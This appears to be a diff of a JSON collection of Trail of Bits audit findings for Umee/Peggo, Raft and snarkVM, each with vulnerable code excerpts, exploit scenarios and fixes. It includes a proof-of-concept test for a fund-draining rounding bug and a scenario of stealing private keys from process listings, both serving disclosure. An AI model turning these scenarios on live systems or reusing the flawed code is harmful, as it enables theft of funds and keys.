"https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In a few code paths, Peggo calculates the number of a delayed block by subtracting a delay value from the latest block number. This subtraction will result in an overow and cause Peggo to operate incorrectly if it is run against a blockchain node whose latest block number is less than the delay value. We set the severity of this nding to informational because the issue is unlikely to occur in practice; moreover, it is easy to have Peggo wait to perform the calculation until the latest block number is one that will not cause an overow. An overow may occur in the following methods: gravityOrchestrator.GetLastCheckedBlock (gure 27.1) gravityOrchestrator.CheckForEvents gravityOrchestrator.EthOracleMainLoop gravityRelayer.FindLatestValset // add delay to ensure minimum confirmations are received and block is finalized currentBlock := latestHeader.Number.Uint64() - ethBlockConfirmationDelay Figure 27.1: peggo/orchestrator/oracle_resync.go#L35-L42 Recommendations Short term, have Peggo wait to calculate the current block number until the blockchain for which Peggo was congured reaches a block number that will not cause an overow.", + "title": "3. Incorrect constant for 1000-year periods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft nance contracts rely on computing the exponential decay to determine the correct base rate for redemptions. In the MathUtils library, a period of 1000 years is chosen as the maximum time period for the decay exponent to prevent an overow. However, the _MINUTES_IN_1000_YEARS constant used is currently incorrect: /// @notice Number of minutes in 1000 years. uint256 internal constant _MINUTES_IN_1000_YEARS = 1000 * 356 days / 1 minutes; Figure 3.1: The declaration of the _MINUTES_IN_1000_YEARS constant Recommendations Short term, change the code to compute the _MINUTES_IN_1000_YEARS constant as 1000 * 365 days / 1 minutes . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the system. Integrate Echidna and smart contract fuzzing in the system to triangulate subtle arithmetic issues.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3682,149 +6380,159 @@ ] }, { - "title": "28. Peggo does not validate Ethereum address formats ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "In several code paths in the Peggo codebase, the go-ethereum HexToAddress function (gure 28.1) is used to parse Ethereum addresses. This function does not return an error when the format of the address passed to it is incorrect. The HexToAddress function is used in tests as well as in the following parts of the codebase: peggo/cmd/peggo/bridge.go#L143 (in the peggo deploy-gravity command, to parse addresses fetched from gravityQueryClient ) peggo/cmd/peggo/bridge.go#L403 (in parsing of the peggo send-to-cosmos command's token-address argument) peggo/cmd/peggo/orchestrator.go#L150 (in the peggo orchestrator [gravity-addr] command) peggo/cmd/peggo/bridge.go#L536 and twice in #L545-L555 peggo/cmd/peggo/keys.go#L199 , #L274 , and #L299 peggo/orchestrator/ethereum/gravity/message_signatures.go#L36 , #L40 , #L102 , and #L117 p eggo/orchestrator/ethereum/gravity/submit_batch.go#L53 , #L72 , #L94 , #L136 , and #L144 peggo/orchestrator/ethereum/gravity/valset_update.go#L37 , #L55 , and #L87 peggo/orchestrator/main_loops.go#L307 peggo/orchestrator/relayer/batch_relaying.go#L81-L82 , #L237 , and #L250 We set the severity of this nding to undetermined because time constraints prevented us from verifying the impact of the issue. However, without additional validation of the addresses fetched from external sources, Peggo may operate on an incorrect Ethereum address. // HexToAddress returns Address with byte values of s. // If s is larger than len(h), s will be cropped from the left. func HexToAddress( s string ) Address { return BytesToAddress( FromHex(s) ) } // FromHex returns the bytes represented by the hexadecimal string s. // s may be prefixed with \"0x\". func FromHex(s string ) [] byte { if has0xPrefix(s) { s = s[ 2 :] } if len (s)% 2 == 1 { s = \"0\" + s } return Hex2Bytes(s) } // Hex2Bytes returns the bytes represented by the hexadecimal string str. func Hex2Bytes(str string ) [] byte { h, _ := hex.DecodeString(str) return h } Figure 28.1: The HexToAddress function, which calls the BytesToAddress , FromHex , and Hex2Bytes functions, ignores any errors that occur during hex-decoding. Recommendations Short term, review the code paths that use the HexToAddress function, and use a function like ValidateEthAddress to validate Ethereum address string formats before calls to HexToAddress . Long term, add tests to ensure that all code paths that use the HexToAddress function properly validate Ethereum address strings before parsing them.", + "title": "4. Inconsistent use of safeTransfer for collateralToken ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft contracts rely on ERC-20 tokens as collateral that must be deposited in order to mint R tokens. However, although the SafeERC20 library is used for collateral token transfers, there are a few places where the safeTransfer function is missing: The transfer of collateralToken in the liquidate function in the PositionManager contract: if (!isRedistribution) { rToken.burn( msg.sender , entirePositionDebt); _totalDebt -= entirePositionDebt; emit TotalDebtChanged(_totalDebt); // Collateral is sent to protocol as a fee only in case of liquidation collateralToken.transfer(feeRecipient, collateralLiquidationFee); } collateralToken.transfer( msg.sender , collateralToSendToLiquidator); Figure 4.1: Unchecked transfers in PositionManager.liquidate The transfer of stETH in the managePositionStETH function in the PositionManagerStETH contract: { if (isCollateralIncrease) { stETH.transferFrom( msg.sender , address ( this ), collateralChange); stETH.approve( address (wstETH), collateralChange); uint256 wstETHAmount = wstETH.wrap(collateralChange); _managePosition( ... ); } else { _managePosition( ... ); uint256 stETHAmount = wstETH.unwrap(collateralChange); stETH.transfer( msg.sender , stETHAmount); } } Figure 4.2: Unchecked transfers in PositionManagerStETH.managePositionStETH Exploit Scenario Governance approves an ERC-20 token that returns a Boolean on failure to be used as collateral. However, since the return values of this ERC-20 token are not checked, Alice, a liquidator, does not receive any collateral for performing a liquidation. Recommendations Short term, use the SafeERC20 librarys safeTransfer function for the collateralToken . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "29. Peggo takes an Ethereum private key as a command-line argument ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Certain Peggo commands take an Ethereum private key ( --eth-pk ) as a command-line argument. If an attacker gained access to a user account on a system running Peggo, the attacker would also gain access to any Ethereum private key passed through the command line. The attacker could then use the key to steal funds from the Ethereum account. $ peggo orchestrator {gravityAddress} \\ --eth-pk= $ETH_PK \\ --eth-rpc= $ETH_RPC \\ --relay-batches= true \\ --relay-valsets= true \\ --cosmos-chain-id=... \\ --cosmos-grpc= \"tcp://...\" \\ --tendermint-rpc= \"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 29.1: An example of a Peggo command line In Linux, all users can inspect other users commands and their arguments. A user can enable the proc lesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specied group. However, in many Linux distributions, those options are not enabled by default. Exploit Scenario An attacker gains access to an unprivileged user account on a system running the Peggo orchestrator. The attacker then uses a tool such as pspy to inspect processes run on the system. When a user or script launches the Peggo orchestrator, the attacker steals the Ethereum private key passed to the orchestrator. Recommendations Short term, avoid using a command-line argument to pass an Ethereum private key to the Peggo program. Instead, fetch the private key from the keyring.", + "title": "5. Tokens may be trapped in an invalid position ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft nance contracts allow users to take out positions by depositing collateral and minting a corresponding amount of R tokens as debt. In order to exit a position, a user must pay back their debt, which allows them to receive their collateral back. To check that a position is closed, the _managePosition function contains a branch that validates that the position's debt is zero after adjustment. However, if the position's debt is zero but there is still some collateral present even after adjustment, then the position is considered invalid and cannot be closed. This could be problematic, especially if some dust is present in the position after the collateral is withdrawn. if (positionDebt == 0 ) { if (positionCollateral != 0 ) { revert InvalidPosition(); } // position was closed, remove it _closePosition(collateralToken, position, false ); } else { _checkValidPosition(collateralToken, positionDebt, positionCollateral); if (newPosition) { collateralTokenForPosition[position] = collateralToken; emit PositionCreated(position); } } Figure 5.1: A snippet from the _managePosition function showing that a position with no debt cannot be closed if any amount of collateral remains Exploit Scenario Alice, a borrower, wants to pay back her debt and receive her collateral in exchange. However, she accidentally leaves some collateral in her position despite paying back all her debt. As a result, her position cannot be closed. Recommendations Short term, if a position's debt is zero, have the _managePosition function refund any excess collateral and close the position. Long term, carefully investigate potential edge cases in the system and use smart contract fuzzing to determine if those edge cases can be realistically reached.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "30. Peggo allows the use of non-local unencrypted URL schemes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The peggo orchestrator command takes --tendermint-rpc and --cosmos-grpc ags specifying Tendermint and Cosmos remote procedure call (RPC) URLs. If an unencrypted non-local URL scheme (such as http:///) is passed to one of those ags, Peggo will not reject it or issue a warning to the user. As a result, an attacker connected to the same local network as the system running Peggo could launch a man-in-the-middle attack, intercepting and modifying the network trac of the device. $ peggo orchestrator {gravityAddress} \\ --eth-pk= $ETH_PK \\ --eth-rpc= $ETH_RPC \\ --relay-batches= true \\ --relay-valsets= true \\ --cosmos-chain-id=... \\ --cosmos-grpc= \"tcp://...\" \\ --tendermint-rpc= \"http://...\" \\ --cosmos-keyring=... \\ --cosmos-keyring-dir=... \\ --cosmos-from=... Figure 30.1: The problematic ags Exploit Scenario A user sets up Peggo with an external Tendermint RPC address and an unencrypted URL scheme (http://). An attacker on the same network performs a man-in-the-middle attack, modifying the values sent to the Peggo orchestrator to his advantage. Recommendations Short term, warn users that they risk a man-in-the-middle attack if they set the RPC endpoint addresses to external hosts that use unencrypted schemes such as http://.", + "title": "6. Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft nance contracts rely on oracles to compute the price of the collateral tokens used throughout the codebase. If the Chainlink oracle is down, the Tellor oracle is used as a backup. However, the Tellor oracle does not use the stETH/USD price feed. Instead it uses the ETH/USD price feed to determine the price of stETH. This could be problematic if stETH depegs, which can occur during black swan events. function _getCurrentTellorResponse() internal view returns (TellorResponse memory tellorResponse) { uint256 count; uint256 time; uint256 value; try tellor.getNewValueCountbyRequestId(ETHUSD_TELLOR_REQ_ID) returns ( uint256 count_) { count = count_; } catch { return (tellorResponse); } Figure 6.1: The Tellor oracle fetching the price of ETH to determine the price of stETH Exploit Scenario Alice has a position in the system. A signicant black swan event causes the depeg of staked Ether. As a result, the Tellor oracle returns an incorrect price, which prevents Alice's position from being liquidated despite being eligible for liquidation. Recommendations Short term, carefully monitor the Tellor oracle, especially during any sort of market volatility. Long term, investigate the robustness of the oracles and document possible circumstances that could cause them to return incorrect prices.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "31. Lack of prioritization of Peggo orchestrator messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridges sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, eectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion. 32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure Severity: Undetermined Diculty: High Type: Conguration Finding ID: TOB-UMEE-32 Target: Peggo orchestrator", + "title": "7. Incorrect constant value for MAX_REDEMPTION_SPREAD ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "The Raft protocol allows a user to redeem their R tokens for underlying wstETH at any time. By doing so, the protocol ensures that it maintains overcollateralization. The redemption spread is part of the redemption rate, which changes based on the price of the R token to incentivize or disincentivize redemption. However, the documentation says that the maximum redemption spread should be 100% and that the protocol will initially set it to 100%. In the code, the MAX_REDEMPTION_SPREAD constant is set to 2%, and the redemptionSpread variable is set to 1% at construction. This is problematic because setting the rate to 100% is necessary to eectively disable redemptions at launch. uint256 public constant override MIN_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 10_000 * 25 ; // 0.25% uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 100 * 2 ; // 2% Figure 7.1: Constants specifying the minimum and maximum redemption spread percentages constructor (ISplitLiquidationCollateral newSplitLiquidationCollateral) FeeCollector( msg.sender ) { rToken = new RToken( address ( this ), msg.sender ); raftDebtToken = new ERC20Indexable( address ( this ), string ( bytes .concat( \"Raft \" , bytes (IERC20Metadata( address (rToken)).name()), \" debt\" )), string ( bytes .concat( \"r\" , bytes (IERC20Metadata( address (rToken)).symbol()), \"-d\" )) ); setRedemptionSpread(MathUtils._100_PERCENT / 100 ); setSplitLiquidationCollateral(newSplitLiquidationCollateral); emit PositionManagerDeployed(rToken, raftDebtToken, msg.sender ); } Figure 7.2: The redemption spread being set to 1% instead of 100% in the PositionManager s constructor Exploit Scenario The protocol sets the redemption spread to 2%. Alice, a borrower, redeems her R tokens for some underlying wstETH, despite the developers intentions. As a result, the stablecoin experiences signicant volatility. Recommendations Short term, set the MAX_REDEMPTION_SPREAD value to 100% and set the redemptionSpread variable to MAX_REDEMPTION_SPREAD in the PositionManager contracts constructor. Long term, improve unit test coverage to identify incorrect behavior and edge cases in the protocol.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "33. Peggo orchestrators IsBatchProtable function uses only one price oracle ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Peggo orchestrator relays batches of Ethereum transactions only when doing so will be protable (gure 33.1). To determine an operations protability, it uses the price of ETH in USD, which is fetched from a single sourcethe CoinGecko API. This creates a single point of failure, as a hacker with control of the API could eectively choose which batches Peggo would relay by manipulating the price. The IsBatchProfitable function (gure 33.2) fetches the ETH/USD price; the gravityRelayer.priceFeeder eld it uses is set earlier in the getOrchestratorCmd function (gure 33.3). func (s *gravityRelayer) RelayBatches( /* (...) */ ) error { // (...) for tokenContract, batches := range possibleBatches { // (...) // Now we iterate through batches per token type. for _, batch := range batches { // (...) // If the batch is not profitable, move on to the next one. if !s.IsBatchProfitable(ctx, batch.Batch, estimatedGasCost, gasPrice, s.profitMultiplier) { continue } // (...) Figure 33.1: peggo/orchestrator/relayer/batch_relaying.go#L173-L176 func (s *gravityRelayer) IsBatchProfitable( / * (...) */ ) bool { // (...) // First we get the cost of the transaction in USD usdEthPrice, err := s.priceFeeder.QueryETHUSDPrice() Figure 33.2: peggo/orchestrator/relayer/batch_relaying.go#L211-L223 func getOrchestratorCmd() *cobra.Command { cmd := &cobra.Command{ Use: \"orchestrator [gravity-addr]\" , Args: cobra.ExactArgs( 1 ), Short: \"Starts the orchestrator\" , RunE: func (cmd *cobra.Command, args [] string ) error { // (...) coingeckoAPI := konfig.String(flagCoinGeckoAPI) coingeckoFeed := coingecko.NewCoingeckoPriceFeed( /* (...) */ ) // (...) relayer := relayer.NewGravityRelayer( /* (...) */ , relayer.SetPriceFeeder(coingeckoFeed), ) Figure 33.3: peggo/cmd/peggo/orchestrator.go#L162-L188 Exploit Scenario All Peggo orchestrator instances depend on the CoinGecko API. An attacker hacks the CoinGecko API and falsies the ETH/USD prices provided to the Peggo relayers, causing them to relay unprotable batches. Recommendations Short term, address the Peggo orchestrators reliance on a single ETH/USD price feed. Consider using the price-feeder tool to fetch pricing information or reading prices from the Umee blockchain. Long term, implement protections against extreme ETH/USD price changes; if the ETH/USD price changes by too large a margin, have the system stop fetching prices and require an operator to investigate whether the issue was caused by malicious behavior. Additionally, implement tests to check the orchestrators handling of random and extreme changes in the prices reported by the price feed. References Check Coingecko prices separately from BatchRequesterLoop (GitHub issue)", + "title": "8. Liquidation rewards are calculated incorrectly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-04-tempus-raft-securityreview.pdf", + "body": "Whenever a position's collateralization ratio falls between 100% and 110%, the position becomes eligible for liquidation. A liquidator can pay o the position's total debt to restore solvency. In exchange, the liquidator receives a liquidation reward for removing bad debt, in addition to the amount of debt the liquidator has paid o. However, the calculation performed in the split function is incorrect and does not reward the liquidator with the matchingCollateral amount of tokens: function split( uint256 totalCollateral, uint256 totalDebt, uint256 price, bool isRedistribution ) external pure returns ( uint256 collateralToSendToProtocol, uint256 collateralToSentToLiquidator) { if (isRedistribution) { ... } else { uint256 matchingCollateral = totalDebt.divDown(price); uint256 excessCollateral = totalCollateral - matchingCollateral; uint256 liquidatorReward = excessCollateral.mulDown(_calculateLiquidatorRewardRate(totalDebt)); collateralToSendToProtocol = excessCollateral - liquidatorReward; collateralToSentToLiquidator = liquidatorReward; } } Figure 8.1: The calculations for how to split the collateral between the liquidator and the protocol, showing that the matchingCollateral is omitted from the liquidators reward Exploit Scenario Alice, a liquidator, attempts to liquidate an insolvent position. However, upon liquidation, she receives only the liquidationReward amount of tokens, without the matchingCollateral . As a result her liquidation is unprotable and she has lost funds. Recommendations Short term, have the code compute the collateralToSendToLiquidator variable as liquidationReward + matchingCollateral . Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "34. Rounding errors may cause the module to incur losses ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The amount that a user has borrowed is calculated using AdjustedBorrow data and an InterestScalar value. Because the system uses xed-precision decimal numbers that are truncated to integer values, there may be small rounding errors in the computation of those amounts. If an error occurs, it will benet the user, whose repayment will be slightly lower than the amount the user borrowed. Figure 34.1 shows a test case demonstrating this vulnerability. It should be added to the umee/x/leverage/keeper/keeper_test.go le. Appendix G discusses general rounding recommendations. // Test rounding error bug - users can repay less than have borrowed // It should pass func (s *IntegrationTestSuite) TestTruncationBug() { lenderAddr, _ := s.initBorrowScenario() app, ctx := s.app, s.ctx // set some interesting interest scalar _ = s.app.LeverageKeeper.SetInterestScalar(s.ctx, umeeapp.BondDenom, sdk.MustNewDecFromStr( \"2.9\" )) // save initial balances initialSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply.Amount.Int64(), int64 ( 10000000000 )) initialModuleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) // lender borrows 20 umee err := s.app.LeverageKeeper.BorrowAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 20000000 )) s.Require().NoError(err) // lender repays in a few transactions iters := int64 ( 99 ) payOneIter := int64 ( 2000 ) amountDelta := int64 ( 99 ) // borrowed expects to \"earn\" this amount for i := int64 ( 0 ); i < iters; i++ { repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, payOneIter)) s.Require().NoError(err) s.Require().Equal(sdk.NewInt(payOneIter), repaid) } // lender repays remaining debt - less than he borrowed // we send 90000000, because it will be truncated to the actually owned amount repaid, err := s.app.LeverageKeeper.RepayAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 90000000 )) s.Require().NoError(err) s.Require().Equal(repaid.Int64(), 20000000 -(iters*payOneIter)-amountDelta) // verify lender's new loan amount in the correct denom (zero) loanBalance := s.app.LeverageKeeper.GetBorrow(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(loanBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 0 )) // we expect total supply to not change finalSupply := s.app.BankKeeper.GetSupply(s.ctx, umeeapp.BondDenom) s.Require().Equal(initialSupply, finalSupply) // verify lender's new umee balance // should be 10 - 1k from initial + 20 from loan - 20 repaid = 9000 umee // it is more -> borrower benefits tokenBalance := app.BankKeeper.GetBalance(ctx, lenderAddr, umeeapp.BondDenom) s.Require().Equal(tokenBalance, sdk.NewInt64Coin(umeeapp.BondDenom, 9000000000 +amountDelta)) // in test, we didn't pay interest, so module balance should not have changed // but it did because of rounding moduleBalance := s.app.LeverageKeeper.ModuleBalance(s.ctx, umeeapp.BondDenom) s.Require().NotEqual(moduleBalance, initialModuleBalance) s.Require().Equal(moduleBalance.Int64(), int64 ( 1000000000 -amountDelta)) } Figure 34.1: A test case demonstrating the rounding bug Exploit Scenario An attacker identies a high-value coin. He takes out a loan and repays it in a single transaction and then repeats the process again and again. By using a single transaction for both operations, he evades the borrowing fee (i.e., the interest scalar is not increased). Because of rounding errors in the systems calculations, he turns a prot by repaying less than he borrowed each time. His prots exceed the transaction fees, and he continues his attack until he has completely drained the module of its funds. Exploit Scenario 2 The Umee system has numerous users. Each user executes many transactions, so the system must perform many calculations. Each calculation with a rounding error causes it to lose a small amount of tokens, but eventually, the small losses add up and leave the system without the essential funds. Recommendations Short term, always use the rounding direction that will benet the module rather than the user. Long term, to ensure that users pay the necessary fees, consider prohibiting them from borrowing and repaying a loan in the same block. Additionally, use fuzz testing to ensure that it is not possible for users to secure free tokens. References How to Become a Millionaire, 0.", + "title": "1. Consoles Field and Scalar divisions panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The division operation of the Field and Scalar types do not guard against a division by zero. This causes a runtime panic when values from these types are divided by zero. Figure 1.1 shows a test and the respective stack backtrace, where a None option is unconditionally unwrapped in snarkvm/fields/src/fp_256.rs : #[test] fn test_div () { let zero = Field::::zero(); // Sample a new field. let num = Field::::new(Uniform::rand(& mut test_rng())); // Divide by zero let neg = num.div(zero); } // running 1 test // thread 'arithmetic::tests::test_div' panicked at 'called `Option::unwrap()` on a `None` value', /snarkvm/fields/src/fp_256.rs:709:42 // stack backtrace: // 0: rust_begin_unwind // at /rustc/v/library/std/src/panicking.rs:584:5 // 1: core::panicking::panic_fmt // at /rustc/v/library/core/src/panicking.rs:142:14 // 2: core::panicking::panic // at /rustc/v/library/core/src/panicking.rs:48:5 // 3: core::option::Option::unwrap // at /rustc/v/library/core/src/option.rs:755:21 // 4: as core::ops::arith::DivAssign<&snarkvm_fields::fp_256::Fp256

>>::div_assign // at snarkvm/fields/src/fp_256.rs:709:26 // 5: as core::ops::arith::Div>::div // at snarkvm/fields/src/macros.rs:524:17 // 6: snarkvm_console_types_field::arithmetic::>::div // at ./src/arithmetic.rs:143: // 7: snarkvm_console_types_field::arithmetic::tests::test_div // at ./src/arithmetic.rs:305:23 Figure 1.1: Test triggering the division by zero The same issue is present in the Scalar type, which has no zero-check for other : impl Div> for Scalar { type Output = Scalar; /// Returns the `quotient` of `self` and `other`. #[inline] fn div ( self , other: Scalar ) -> Self ::Output { Scalar::new( self .scalar / other.scalar) } } Figure 1.2: console/types/scalar/src/arithmetic.rs#L137-L146 Exploit Scenario An attacker sends a zero value which is used in a division, causing a runtime error and the program to halt. Recommendations Short term, add checks to validate that the divisor is non-zero on both the Field and Scalar divisions. Long term, add tests exercising all arithmetic operations with the zero element.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "35. Outdated and vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Both Umee and Peggo rely on outdated and vulnerable dependencies. The table below lists the problematic packages used by Umee dependencies; the yellow rows indicate packages that were also detected in Peggo dependencies. We set the severity of this nding to undetermined because we could not conrm whether these vulnerabilities aect Umee or Peggo. However, they likely do not, since most of the CVEs are related to binaries or components that are not run in the Umee or Peggo code. Package Vulnerabilities golang/github.com/coreos/etc d@3.3.13 pkg:golang/github.com/dgrija lva/jwt-go@3.2.0 CVE-2020-15114 CVE-2020-15136 CVE-2020-15115 CVE-2020-26160 golang/github.com/microcosm- cc/bluemonday@1.0.4 #111 (CWE-79) golang/k8s.io/kubernetes@1.1 3.0 CVE-2020-8558, CVE-2019-11248, CVE-2019-11247, CVE-2019-11243, CVE-2021-25741, CVE-2019-9946, CVE-2020-8552, CVE-2019-11253, CVE-2020-8559, CVE-2021-25735, CVE-2019-11250, CVE-2019-11254, CVE-2019-11249, CVE-2019-11246, CVE-2019-1002100, CVE-2020-8555, CWE-601, CVE-2019-11251, CVE-2019-1002101, CVE-2020-8563, CVE-2020-8557, CVE-2019-11244 Recommendations Short term, update the outdated and vulnerable dependencies. Even if they do not currently aect Umee or Peggo, a change in the way they are used could introduce a bug. Long term, integrate a dependency-checking tool such as nancy into the CI/CD pipeline. Frequently update any direct dependencies, and ensure that any indirect dependencies in upstream libraries remain up to date. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "2. from_xy_coordinates function lacks checks and can panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "Unlike Group::from_x_coordinate , the Group::from_xy_coordinates function does not enforce the resulting point to be on the elliptic curve or in the correct subgroup. Two dierent behaviors can occur depending on the underlying curve: For a short Weierstrass curve (gure 2.1), the function will always succeed and not perform any membership checks on the point; this could lead to an invalid point being used in other curve operations, potentially leading to an invalid curve attack. /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y, infinity) = coordinates; Self { x, y, infinity } } Figure 2.1: No curve membership checks present at curves/src/templates/short_weierstrass_jacobian/affine.rs#L103-L107 For a twisted Edwards curve (gure 2.2), the function will panic if the point is not on the curveunlike the from_x_coordinate function, which returns an Option . /// Initializes a new affine group element from the given coordinates. fn from_coordinates (coordinates: Self ::Coordinates) -> Self { let (x, y) = coordinates; let point = Self { x, y }; assert! (point.is_on_curve()); point } Figure 2.2: curves/src/templates/twisted_edwards_extended/affine.rs#L102-L108 Exploit Scenario An attacker is able to construct an invalid point for the short Weierstrass curve, potentially revealing secrets if this point is used in scalar multiplications with secret data. Recommendations Short term, make the output type similar to the from_x_coordinate function, returning an Option . Enforce curve membership on the short Weierstrass implementation and consider returning None instead of panicking when the point is not on the twisted Edwards curve.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "25. Insecure storage of price-feeder keyring passwords ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Users can store oracle keyring passwords in the price-feeder conguration le. However, the price-feeder stores these passwords in plaintext and does not provide a warning if the conguration le has overly broad permissions (like those shown in gure 25.1). Additionally, neither the price-feeder README nor the relevant documentation string instructs users to provide keyring passwords via standard input (gure 25.2), which is a safer approach. Moreover, neither source provides information on dierent keyring back ends, and the example price-feeder conguration uses the \"test\" back end . An attacker with access to the conguration le on a users system, or to a backup of the conguration le, could steal the users keyring information and hijack the price-feeder oracle instance. $ ls -la ./price-feeder/price-feeder.example.toml -rwx rwxrwx 1 dc dc 848 Feb 6 10:37 ./price-feeder/price-feeder.example.toml $ grep pass ./price-feeder/price-feeder.example.toml pass = \"exampleKeyringPassword\" $ ~/go/bin/price-feeder ./price-feeder/price-feeder.example.toml 10:42AM INF starting price-feeder oracle... 10:42AM ERR oracle tick failed error=\"key with addressA4F324A31DECC0172A83E57A3625AF4B89A91F1Fnot found: key not found\" module=oracle 10:42AM INF starting price-feeder server... listen_addr=0.0.0.0:7171 Figure 25.1: The price-feeder does not warn the user if the conguration le used to store the keyring password in plaintext has overly broad permissions. // CreateClientContext creates an SDK client Context instance used for transaction // generation, signing and broadcasting. func (oc OracleClient) CreateClientContext() (client.Context, error ) { var keyringInput io.Reader if len (oc.KeyringPass) > 0 { keyringInput = newPassReader(oc.KeyringPass) } else { keyringInput = os.Stdin } Figure 25.2: The price-feeder supports the use of standard input to provide keyring passwords. ( umee/price-feeder/oracle/client/client.go#L184-L192 ) Exploit Scenario A user sets up a price-feeder oracle and stores the keyring password in the price-feeder conguration le, which has been miscongured with overly broad permissions. An attacker gains access to another user account on the user's machine and is able to read the price-feeder oracle's keyring password. The attacker uses that password to access the keyring data and can then control the user's oracle account. Recommendations Short term, take the following steps: Recommend that users provide keyring passwords via standard input. Check the permissions of the conguration le. If the permissions are too broad, provide an error warning the user of the issue, as openssh does when it nds that a private key le has overly broad permissions. Document the risks associated with storing a keyring password in the conguration le. Improve the price-feeder s keyring-related documentation. Include a link to the Cosmos SDK keyring documentation so that users can learn about dierent keyring back ends and the addition of keyring entries, among other concepts.", + "title": "3. Blake2Xs implementation fails to provide the requested number of bytes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Blake2Xs implementation returns an empty byte array when the requested number of bytes is between u16::MAX-30 and u16::MAX . The Blake2Xs is an extendible-output hash function (XOF): It receives a parameter called xof_digest_length that determines how many bytes the hash function should return. When computing the necessary number of rounds, there is an integer overow if xof_digest_length is between u16::MAX-30 and u16::MAX . This integer overow causes the number of rounds to be zero and the resulting hash to have zero bytes. fn evaluate (input: & [ u8 ], xof_digest_length : u16 , persona: & [ u8 ]) -> Vec < u8 > { assert! (xof_digest_length > 0 , \"Output digest must be of non-zero length\" ); assert! (persona.len() <= 8 , \"Personalization may be at most 8 characters\" ); // Start by computing the digest of the input bytes. let xof_digest_length_node_offset = (xof_digest_length as u64 ) << 32 ; let input_digest = blake2s_simd::Params::new() .hash_length( 32 ) .node_offset(xof_digest_length_node_offset) .personal(persona) 